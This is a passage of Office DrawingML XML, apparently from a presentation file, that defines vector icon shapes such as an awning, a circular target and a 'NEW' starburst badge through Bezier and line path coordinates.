                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="161" y="122"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="100" y="149"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="101"/>
                    <a:pt x="148" y="101"/>
                    <a:pt x="148" y="101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03" y="152"/>
                    <a:pt x="103" y="152"/>
                    <a:pt x="103" y="152"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="100" y="149"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="57" y="110"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="106"/>
                    <a:pt x="60" y="102"/>
                    <a:pt x="64" y="102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="102"/>
                    <a:pt x="71" y="106"/>
                    <a:pt x="71" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="112"/>
                    <a:pt x="70" y="114"/>
                    <a:pt x="68" y="116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70" y="141"/>
                    <a:pt x="71" y="143"/>
                    <a:pt x="71" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="150"/>
                    <a:pt x="68" y="153"/>
                    <a:pt x="64" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="153"/>
                    <a:pt x="57" y="150"/>
                    <a:pt x="57" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="143"/>
                    <a:pt x="58" y="141"/>
                    <a:pt x="60" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="115"/>
                    <a:pt x="60" y="115"/>
                    <a:pt x="60" y="115"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="114"/>
                    <a:pt x="57" y="112"/>
                    <a:pt x="57" y="110"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="181" y="92"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="92"/>
                    <a:pt x="167" y="85"/>
                    <a:pt x="166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85"/>
                    <a:pt x="156" y="92"/>
                    <a:pt x="148" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="141" y="92"/>
                    <a:pt x="134" y="85"/>
                    <a:pt x="134" y="7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0" y="85"/>
                    <a:pt x="124" y="92"/>
                    <a:pt x="116" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="92"/>
                    <a:pt x="102" y="85"/>
                    <a:pt x="101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8" y="85"/>
                    <a:pt x="92" y="92"/>
                    <a:pt x="84" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="92"/>
                    <a:pt x="69" y="85"/>
                    <a:pt x="69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6" y="85"/>
                    <a:pt x="59" y="92"/>
                    <a:pt x="51" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="92"/>
                    <a:pt x="37" y="85"/>
                    <a:pt x="37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3" y="85"/>
                    <a:pt x="27" y="92"/>
                    <a:pt x="19" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="92"/>
                    <a:pt x="5" y="85"/>
                    <a:pt x="4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196" y="72"/>
                    <a:pt x="196" y="72"/>
                    <a:pt x="196" y="72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5" y="85"/>
                    <a:pt x="189" y="92"/>
                    <a:pt x="181" y="92"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="22" y="12"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="12"/>
                    <a:pt x="177" y="12"/>
                    <a:pt x="177" y="12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4" y="68"/>
                    <a:pt x="4" y="68"/>
                    <a:pt x="4" y="68"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="22" y="12"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="164" y="64"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="64"/>
                    <a:pt x="172" y="64"/>
                    <a:pt x="172" y="64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2" y="16"/>
                    <a:pt x="152" y="16"/>
                    <a:pt x="152" y="16"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="164" y="64"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="132" y="64"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="64"/>
                    <a:pt x="140" y="64"/>
                    <a:pt x="140" y="64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24" y="16"/>
                    <a:pt x="124" y="16"/>
                    <a:pt x="124" y="16"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="132" y="64"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="96" y="64"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="64"/>
                    <a:pt x="104" y="64"/>
                    <a:pt x="104" y="64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96" y="16"/>
                    <a:pt x="96" y="16"/>
                    <a:pt x="96" y="16"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="96" y="64"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="68" y="64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0" y="64"/>
                    <a:pt x="60" y="64"/>
                    <a:pt x="60" y="64"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="68" y="64"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="64"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="16"/>
                    <a:pt x="48" y="16"/>
                    <a:pt x="48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64"/>
                    <a:pt x="28" y="64"/>
                    <a:pt x="28" y="64"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="36" y="64"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="20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0" y="8"/>
                    <a:pt x="180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14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{304BF231-0C41-499B-AE08-E9268B1088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-185" y="61549"/>
              <a:ext cx="825242" cy="825242"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 99 w 197"/>
                <a:gd name="T1" fmla="*/ 197 h 197"/>
                <a:gd name="T2" fmla="*/ 197 w 197"/>
                <a:gd name="T3" fmla="*/ 98 h 197"/>
                <a:gd name="T4" fmla="*/ 99 w 197"/>
                <a:gd name="T5" fmla="*/ 0 h 197"/>
                <a:gd name="T6" fmla="*/ 29 w 197"/>
                <a:gd name="T7" fmla="*/ 29 h 197"/>
                <a:gd name="T8" fmla="*/ 29 w 197"/>
                <a:gd name="T9" fmla="*/ 169 h 197"/>
                <a:gd name="T10" fmla="*/ 99 w 197"/>
                <a:gd name="T11" fmla="*/ 17 h 197"/>
                <a:gd name="T12" fmla="*/ 180 w 197"/>
                <a:gd name="T13" fmla="*/ 98 h 197"/>
                <a:gd name="T14" fmla="*/ 99 w 197"/>
                <a:gd name="T15" fmla="*/ 181 h 197"/>
                <a:gd name="T16" fmla="*/ 17 w 197"/>
                <a:gd name="T17" fmla="*/ 99 h 197"/>
                <a:gd name="T18" fmla="*/ 36 w 197"/>
                <a:gd name="T19" fmla="*/ 118 h 197"/>
                <a:gd name="T20" fmla="*/ 56 w 197"/>
                <a:gd name="T21" fmla="*/ 145 h 197"/>
                <a:gd name="T22" fmla="*/ 41 w 197"/>
                <a:gd name="T23" fmla="*/ 117 h 197"/>
                <a:gd name="T24" fmla="*/ 39 w 197"/>
                <a:gd name="T25" fmla="*/ 95 h 197"/>
                <a:gd name="T26" fmla="*/ 99 w 197"/>
                <a:gd name="T27" fmla="*/ 39 h 197"/>
                <a:gd name="T28" fmla="*/ 143 w 197"/>
                <a:gd name="T29" fmla="*/ 59 h 197"/>
                <a:gd name="T30" fmla="*/ 150 w 197"/>
                <a:gd name="T31" fmla="*/ 71 h 197"/>
                <a:gd name="T32" fmla="*/ 158 w 197"/>
                <a:gd name="T33" fmla="*/ 92 h 197"/>
                <a:gd name="T34" fmla="*/ 157 w 197"/>
                <a:gd name="T35" fmla="*/ 114 h 197"/>
                <a:gd name="T36" fmla="*/ 136 w 197"/>
                <a:gd name="T37" fmla="*/ 125 h 197"/>
                <a:gd name="T38" fmla="*/ 131 w 197"/>
                <a:gd name="T39" fmla="*/ 67 h 197"/>
                <a:gd name="T40" fmla="*/ 117 w 197"/>
                <a:gd name="T41" fmla="*/ 57 h 197"/>
                <a:gd name="T42" fmla="*/ 95 w 197"/>
                <a:gd name="T43" fmla="*/ 54 h 197"/>
                <a:gd name="T44" fmla="*/ 53 w 197"/>
                <a:gd name="T45" fmla="*/ 99 h 197"/>
                <a:gd name="T46" fmla="*/ 71 w 197"/>
                <a:gd name="T47" fmla="*/ 131 h 197"/>
                <a:gd name="T48" fmla="*/ 59 w 197"/>
                <a:gd name="T49" fmla="*/ 99 h 197"/>
                <a:gd name="T50" fmla="*/ 94 w 197"/>
                <a:gd name="T51" fmla="*/ 59 h 197"/>
                <a:gd name="T52" fmla="*/ 115 w 197"/>
                <a:gd name="T53" fmla="*/ 63 h 197"/>
                <a:gd name="T54" fmla="*/ 138 w 197"/>
                <a:gd name="T55" fmla="*/ 99 h 197"/>
                <a:gd name="T56" fmla="*/ 111 w 197"/>
                <a:gd name="T57" fmla="*/ 99 h 197"/>
                <a:gd name="T58" fmla="*/ 99 w 197"/>
                <a:gd name="T59" fmla="*/ 88 h 197"/>
                <a:gd name="T60" fmla="*/ 98 w 197"/>
                <a:gd name="T61" fmla="*/ 111 h 197"/>
                <a:gd name="T62" fmla="*/ 152 w 197"/>
                <a:gd name="T63" fmla="*/ 153 h 197"/>
                <a:gd name="T64" fmla="*/ 150 w 197"/>
                <a:gd name="T65" fmla="*/ 139 h 197"/>
                <a:gd name="T66" fmla="*/ 172 w 197"/>
                <a:gd name="T67" fmla="*/ 103 h 197"/>
                <a:gd name="T68" fmla="*/ 156 w 197"/>
                <a:gd name="T69" fmla="*/ 67 h 197"/>
                <a:gd name="T70" fmla="*/ 150 w 197"/>
                <a:gd name="T71" fmla="*/ 55 h 197"/>
                <a:gd name="T72" fmla="*/ 145 w 197"/>
                <a:gd name="T73" fmla="*/ 52 h 197"/>
                <a:gd name="T74" fmla="*/ 52 w 197"/>
                <a:gd name="T75" fmla="*/ 52 h 197"/>
                <a:gd name="T76" fmla="*/ 25 w 197"/>
                <a:gd name="T77" fmla="*/ 10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7" h="197">
                  <a:moveTo>
                    <a:pt x="29" y="169"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="188"/>
                    <a:pt x="73" y="197"/>
                    <a:pt x="99" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="197"/>
                    <a:pt x="149" y="188"/>
                    <a:pt x="168" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="149"/>
                    <a:pt x="197" y="124"/>
                    <a:pt x="197" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="73"/>
                    <a:pt x="187" y="48"/>
                    <a:pt x="168" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="149" y="10"/>
                    <a:pt x="124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73" y="0"/>
                    <a:pt x="48" y="10"/>
                    <a:pt x="29" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="48"/>
                    <a:pt x="0" y="74"/>
                    <a:pt x="0" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="124"/>
                    <a:pt x="10" y="149"/>
                    <a:pt x="29" y="169"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="41" y="41"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="25"/>
                    <a:pt x="78" y="17"/>
                    <a:pt x="99" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="17"/>
                    <a:pt x="140" y="25"/>
                    <a:pt x="156" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="57"/>
                    <a:pt x="180" y="78"/>
                    <a:pt x="180" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="119"/>
                    <a:pt x="173" y="141"/>
                    <a:pt x="156" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="173"/>
                    <a:pt x="120" y="181"/>
                    <a:pt x="99" y="181"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="181"/>
                    <a:pt x="57" y="173"/>
                    <a:pt x="41" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="141"/>
                    <a:pt x="17" y="120"/>
                    <a:pt x="17" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="78"/>
                    <a:pt x="25" y="57"/>
                    <a:pt x="41" y="41"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="118"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="128"/>
                    <a:pt x="44" y="137"/>
                    <a:pt x="52" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="146"/>
                    <a:pt x="55" y="146"/>
                    <a:pt x="56" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="144"/>
                    <a:pt x="57" y="142"/>
                    <a:pt x="56" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="134"/>
                    <a:pt x="44" y="126"/>
                    <a:pt x="41" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="115"/>
                    <a:pt x="48" y="111"/>
                    <a:pt x="48" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="101"/>
                    <a:pt x="44" y="96"/>
                    <a:pt x="39" y="95"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="81"/>
                    <a:pt x="46" y="67"/>
                    <a:pt x="56" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="45"/>
                    <a:pt x="83" y="39"/>
                    <a:pt x="99" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="114" y="39"/>
                    <a:pt x="129" y="45"/>
                    <a:pt x="141" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="57"/>
                    <a:pt x="142" y="58"/>
                    <a:pt x="143" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="60"/>
                    <a:pt x="142" y="61"/>
                    <a:pt x="142" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="67"/>
                    <a:pt x="145" y="71"/>
                    <a:pt x="150" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="71"/>
                    <a:pt x="151" y="71"/>
                    <a:pt x="151" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="77"/>
                    <a:pt x="157" y="85"/>
                    <a:pt x="158" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="93"/>
                    <a:pt x="149" y="98"/>
                    <a:pt x="149" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="149" y="108"/>
                    <a:pt x="152" y="112"/>
                    <a:pt x="157" y="114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="121"/>
                    <a:pt x="151" y="129"/>
                    <a:pt x="146" y="13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41" y="117"/>
                    <a:pt x="144" y="108"/>
                    <a:pt x="144" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="87"/>
                    <a:pt x="140" y="76"/>
                    <a:pt x="131" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="63"/>
                    <a:pt x="122" y="60"/>
                    <a:pt x="117" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="57"/>
                    <a:pt x="117" y="57"/>
                    <a:pt x="117" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="51"/>
                    <a:pt x="112" y="45"/>
                    <a:pt x="106" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="45"/>
                    <a:pt x="96" y="49"/>
                    <a:pt x="95" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="55"/>
                    <a:pt x="74" y="59"/>
                    <a:pt x="66" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="76"/>
                    <a:pt x="53" y="87"/>
                    <a:pt x="53" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="111"/>
                    <a:pt x="58" y="122"/>
                    <a:pt x="66" y="131"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="132"/>
                    <a:pt x="69" y="132"/>
                    <a:pt x="71" y="131"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="130"/>
                    <a:pt x="72" y="128"/>
                    <a:pt x="71" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="119"/>
                    <a:pt x="59" y="109"/>
                    <a:pt x="59" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="89"/>
                    <a:pt x="63" y="79"/>
                    <a:pt x="71" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="64"/>
                    <a:pt x="86" y="60"/>
                    <a:pt x="94" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="96" y="65"/>
                    <a:pt x="100" y="68"/>
                    <a:pt x="106" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="68"/>
                    <a:pt x="113" y="66"/>
                    <a:pt x="115" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="65"/>
                    <a:pt x="123" y="67"/>
                    <a:pt x="127" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="79"/>
                    <a:pt x="138" y="89"/>
                    <a:pt x="138" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="106"/>
                    <a:pt x="136" y="114"/>
                    <a:pt x="132" y="120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3"/>
                    <a:pt x="105" y="88"/>
                    <a:pt x="99" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="88"/>
                    <a:pt x="88" y="93"/>
                    <a:pt x="88" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="105"/>
                    <a:pt x="92" y="110"/>
                    <a:pt x="98" y="111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4" y="156"/>
                    <a:pt x="149" y="156"/>
                    <a:pt x="152" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="149"/>
                    <a:pt x="155" y="144"/>
                    <a:pt x="152" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="139"/>
                    <a:pt x="150" y="139"/>
                    <a:pt x="150" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="156" y="132"/>
                    <a:pt x="160" y="123"/>
                    <a:pt x="162" y="115"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="114"/>
                    <a:pt x="172" y="109"/>
                    <a:pt x="172" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="98"/>
                    <a:pt x="169" y="93"/>
                    <a:pt x="164" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="84"/>
                    <a:pt x="160" y="75"/>
                    <a:pt x="156" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="66"/>
                    <a:pt x="158" y="65"/>
                    <a:pt x="158" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="58"/>
                    <a:pt x="154" y="55"/>
                    <a:pt x="150" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="149" y="55"/>
                    <a:pt x="148" y="55"/>
                    <a:pt x="148" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="54"/>
                    <a:pt x="146" y="53"/>
                    <a:pt x="145" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="40"/>
                    <a:pt x="115" y="33"/>
                    <a:pt x="99" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="33"/>
                    <a:pt x="65" y="40"/>
                    <a:pt x="52" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="64"/>
                    <a:pt x="34" y="80"/>
                    <a:pt x="33" y="95"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="97"/>
                    <a:pt x="25" y="101"/>
                    <a:pt x="25" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="112"/>
                    <a:pt x="30" y="117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99EDBDC9-7380-46D9-B5AC-AF4FB0CC03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flipH="1" flipV="1">
              <a:off x="6343221" y="1893150"/>
              <a:ext cx="731838" cy="730250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 414 w 461"/>
                <a:gd name="T1" fmla="*/ 211 h 460"/>
                <a:gd name="T2" fmla="*/ 442 w 461"/>
                <a:gd name="T3" fmla="*/ 116 h 460"/>
                <a:gd name="T4" fmla="*/ 348 w 461"/>
                <a:gd name="T5" fmla="*/ 88 h 460"/>
                <a:gd name="T6" fmla="*/ 301 w 461"/>
                <a:gd name="T7" fmla="*/ 0 h 460"/>
                <a:gd name="T8" fmla="*/ 213 w 461"/>
                <a:gd name="T9" fmla="*/ 48 h 460"/>
                <a:gd name="T10" fmla="*/ 116 w 461"/>
                <a:gd name="T11" fmla="*/ 19 h 460"/>
                <a:gd name="T12" fmla="*/ 88 w 461"/>
                <a:gd name="T13" fmla="*/ 114 h 460"/>
                <a:gd name="T14" fmla="*/ 0 w 461"/>
                <a:gd name="T15" fmla="*/ 161 h 460"/>
                <a:gd name="T16" fmla="*/ 47 w 461"/>
                <a:gd name="T17" fmla="*/ 249 h 460"/>
                <a:gd name="T18" fmla="*/ 19 w 461"/>
                <a:gd name="T19" fmla="*/ 344 h 460"/>
                <a:gd name="T20" fmla="*/ 114 w 461"/>
                <a:gd name="T21" fmla="*/ 372 h 460"/>
                <a:gd name="T22" fmla="*/ 161 w 461"/>
                <a:gd name="T23" fmla="*/ 460 h 460"/>
                <a:gd name="T24" fmla="*/ 248 w 461"/>
                <a:gd name="T25" fmla="*/ 413 h 460"/>
                <a:gd name="T26" fmla="*/ 345 w 461"/>
                <a:gd name="T27" fmla="*/ 441 h 460"/>
                <a:gd name="T28" fmla="*/ 374 w 461"/>
                <a:gd name="T29" fmla="*/ 346 h 460"/>
                <a:gd name="T30" fmla="*/ 461 w 461"/>
                <a:gd name="T31" fmla="*/ 299 h 460"/>
                <a:gd name="T32" fmla="*/ 414 w 461"/>
                <a:gd name="T33" fmla="*/ 211 h 460"/>
                <a:gd name="T34" fmla="*/ 156 w 461"/>
                <a:gd name="T35" fmla="*/ 294 h 460"/>
                <a:gd name="T36" fmla="*/ 133 w 461"/>
                <a:gd name="T37" fmla="*/ 294 h 460"/>
                <a:gd name="T38" fmla="*/ 92 w 461"/>
                <a:gd name="T39" fmla="*/ 225 h 460"/>
                <a:gd name="T40" fmla="*/ 92 w 461"/>
                <a:gd name="T41" fmla="*/ 294 h 460"/>
                <a:gd name="T42" fmla="*/ 69 w 461"/>
                <a:gd name="T43" fmla="*/ 294 h 460"/>
                <a:gd name="T44" fmla="*/ 69 w 461"/>
                <a:gd name="T45" fmla="*/ 195 h 460"/>
                <a:gd name="T46" fmla="*/ 99 w 461"/>
                <a:gd name="T47" fmla="*/ 195 h 460"/>
                <a:gd name="T48" fmla="*/ 133 w 461"/>
                <a:gd name="T49" fmla="*/ 251 h 460"/>
                <a:gd name="T50" fmla="*/ 133 w 461"/>
                <a:gd name="T51" fmla="*/ 195 h 460"/>
                <a:gd name="T52" fmla="*/ 156 w 461"/>
                <a:gd name="T53" fmla="*/ 195 h 460"/>
                <a:gd name="T54" fmla="*/ 156 w 461"/>
                <a:gd name="T55" fmla="*/ 294 h 460"/>
                <a:gd name="T56" fmla="*/ 246 w 461"/>
                <a:gd name="T57" fmla="*/ 213 h 460"/>
                <a:gd name="T58" fmla="*/ 203 w 461"/>
                <a:gd name="T59" fmla="*/ 213 h 460"/>
                <a:gd name="T60" fmla="*/ 203 w 461"/>
                <a:gd name="T61" fmla="*/ 230 h 460"/>
                <a:gd name="T62" fmla="*/ 244 w 461"/>
                <a:gd name="T63" fmla="*/ 230 h 460"/>
                <a:gd name="T64" fmla="*/ 244 w 461"/>
                <a:gd name="T65" fmla="*/ 251 h 460"/>
                <a:gd name="T66" fmla="*/ 203 w 461"/>
                <a:gd name="T67" fmla="*/ 251 h 460"/>
                <a:gd name="T68" fmla="*/ 203 w 461"/>
                <a:gd name="T69" fmla="*/ 275 h 460"/>
                <a:gd name="T70" fmla="*/ 246 w 461"/>
                <a:gd name="T71" fmla="*/ 275 h 460"/>
                <a:gd name="T72" fmla="*/ 246 w 461"/>
                <a:gd name="T73" fmla="*/ 294 h 460"/>
                <a:gd name="T74" fmla="*/ 177 w 461"/>
                <a:gd name="T75" fmla="*/ 294 h 460"/>
                <a:gd name="T76" fmla="*/ 177 w 461"/>
                <a:gd name="T77" fmla="*/ 195 h 460"/>
                <a:gd name="T78" fmla="*/ 246 w 461"/>
                <a:gd name="T79" fmla="*/ 195 h 460"/>
                <a:gd name="T80" fmla="*/ 246 w 461"/>
                <a:gd name="T81" fmla="*/ 213 h 460"/>
                <a:gd name="T82" fmla="*/ 374 w 461"/>
                <a:gd name="T83" fmla="*/ 294 h 460"/>
                <a:gd name="T84" fmla="*/ 345 w 461"/>
                <a:gd name="T85" fmla="*/ 294 h 460"/>
                <a:gd name="T86" fmla="*/ 329 w 461"/>
                <a:gd name="T87" fmla="*/ 232 h 460"/>
                <a:gd name="T88" fmla="*/ 312 w 461"/>
                <a:gd name="T89" fmla="*/ 294 h 460"/>
                <a:gd name="T90" fmla="*/ 284 w 461"/>
                <a:gd name="T91" fmla="*/ 294 h 460"/>
                <a:gd name="T92" fmla="*/ 260 w 461"/>
                <a:gd name="T93" fmla="*/ 195 h 460"/>
                <a:gd name="T94" fmla="*/ 286 w 461"/>
                <a:gd name="T95" fmla="*/ 195 h 460"/>
                <a:gd name="T96" fmla="*/ 301 w 461"/>
                <a:gd name="T97" fmla="*/ 261 h 460"/>
                <a:gd name="T98" fmla="*/ 317 w 461"/>
                <a:gd name="T99" fmla="*/ 195 h 460"/>
                <a:gd name="T100" fmla="*/ 341 w 461"/>
                <a:gd name="T101" fmla="*/ 195 h 460"/>
                <a:gd name="T102" fmla="*/ 357 w 461"/>
                <a:gd name="T103" fmla="*/ 261 h 460"/>
                <a:gd name="T104" fmla="*/ 371 w 461"/>
                <a:gd name="T105" fmla="*/ 195 h 460"/>
                <a:gd name="T106" fmla="*/ 398 w 461"/>
                <a:gd name="T107" fmla="*/ 195 h 460"/>
                <a:gd name="T108" fmla="*/ 374 w 461"/>
                <a:gd name="T109" fmla="*/ 294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460">
                  <a:moveTo>
                    <a:pt x="414" y="211"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="442" y="116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348" y="88"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213" y="48"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88" y="114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47" y="249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19" y="344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114" y="372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161" y="460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248" y="413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345" y="441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374" y="346"/>
                  </a:lnTo>
                  <a:lnTo>
